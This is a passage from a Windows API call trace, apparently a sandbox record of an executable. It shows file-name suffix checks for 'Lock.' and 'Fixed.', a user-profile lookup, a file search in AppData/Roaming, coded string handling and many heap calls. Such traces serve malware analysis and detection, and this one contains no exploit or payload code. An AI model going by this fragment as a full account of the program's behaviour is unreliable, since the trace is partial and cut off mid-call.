lpString2="Lock.", cchCount2=5) returned 3 [0112.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_4r.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0112.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4r.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0112.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.mp4", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0112.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-M_4r.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0112.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="M_4r.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0112.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_4r.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0112.634] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="4r.mp4", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0112.634] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0112.634] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0112.634] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0112.634] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0112.634] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf3a8, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0112.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.634] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0112.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.634] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.634] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy/AppData/Roaming/-M_4r.mp4", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3294e10, ftCreationTime.dwHighDateTime=0x1d5cfb0, ftLastAccessTime.dwLowDateTime=0x93ca8640, ftLastAccessTime.dwHighDateTime=0x1d5cdd1, ftLastWriteTime.dwLowDateTime=0x93ca8640, ftLastWriteTime.dwHighDateTime=0x1d5cdd1, nFileSizeHigh=0x0, nFileSizeLow=0x15075, dwReserved0=0x0, dwReserved1=0x0, cFileName="-M_4r.mp4", cAlternateFileName="")) returned 0x9a4980 [0112.635] FindClose (in: hFindFile=0x9a4980 | out: hFindFile=0x9a4980) returned 1 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9670 | out: hHeap=0x2af0000) returned 1 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa018 | out: hHeap=0x2af0000) returned 1 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0112.635] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0112.635] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0112.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f40 [0112.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0112.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0112.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0112.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0112.635] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f30 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa168 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa078 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f40 | out: hHeap=0x2af0000) returned 1 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a58 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa078 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0112.636] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0112.636] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c88 | out: hHeap=0x2af0000) returned 1 [0112.636] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa078 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0112.636] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.636] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0112.637] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0112.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0112.637] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0112.637] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e90 | out: hHeap=0x2af0000) returned 1 [0112.637] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b98 | out: hHeap=0x2af0000) returned 1 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1e0 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0112.637] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0112.637] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fa0 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa030 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0112.638] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa030 | out: hHeap=0x2af0000) returned 1 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fa0 | out: hHeap=0x2af0000) returned 1 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed40 [0112.638] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed40 | out: hHeap=0x2af0000) returned 1 [0112.638] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ae8 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b28 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0c0 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.638] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.638] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0c0 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7040 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1b0 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa000 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7040 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0112.639] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1f8 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ae8 [0112.639] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1f8 | out: hHeap=0x2af0000) returned 1 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f58 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a18 [0112.639] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0a8 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b98 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0a8 | out: hHeap=0x2af0000) returned 1 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa000 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa048 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa0f0 | out: hHeap=0x2af0000) returned 1 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa120 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a48 [0112.640] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9fb8 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.640] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9fb8 | out: hHeap=0x2af0000) returned 1 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa120 | out: hHeap=0x2af0000) returned 1 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b08 | out: hHeap=0x2af0000) returned 1 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f58 | out: hHeap=0x2af0000) returned 1 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa048 | out: hHeap=0x2af0000) returned 1 [0112.640] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0112.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ae8 | out: hHeap=0x2af0000) returned 1 [0112.641] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0112.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0112.641] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0112.641] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0112.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f58 | out: hHeap=0x2af0000) returned 1 [0112.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa138 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71b68 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa0f0 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1b0 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0112.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa1f8 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c88 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a58 [0112.641] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa090 | out: hHeap=0x2af0000) returned 1 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa090 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0112.641] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa228 [0112.641] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa108 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a98 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa1e0 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0112.642] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0112.642] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a48 | out: hHeap=0x2af0000) returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa1e0 | out: hHeap=0x2af0000) returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa108 | out: hHeap=0x2af0000) returned 1 [0112.642] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa228 | out: hHeap=0x2af0000) 